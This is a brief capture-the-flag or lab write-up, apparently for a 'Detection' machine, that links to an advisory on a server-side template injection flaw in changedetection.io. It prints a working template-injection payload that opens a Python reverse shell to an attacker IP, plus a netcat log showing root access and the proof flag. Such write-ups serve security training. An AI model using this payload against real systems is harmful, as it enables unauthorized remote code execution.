Detection

Intro

Initial Foothold

https://blog.hacktivesecurity.com/index.php/2024/05/08/cve-2024-32651-server-side-template-injection-changedetection-io/blog.hacktivesecurity.com

Privilege Escalation

PreviouspyLoader NextPipe

Last updated 1 year ago

{{ self.__init__.__globals__.__builtins__.__import__('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"192.168.45.196\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}

┌──(venv)─(root㉿kali)-[/home/joe/hax/pg/detection]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.199.97] 52556
root@detection:/# cat /root/proof.txt
cat /root/proof.txt
4b23104610703656c41480e23a67c656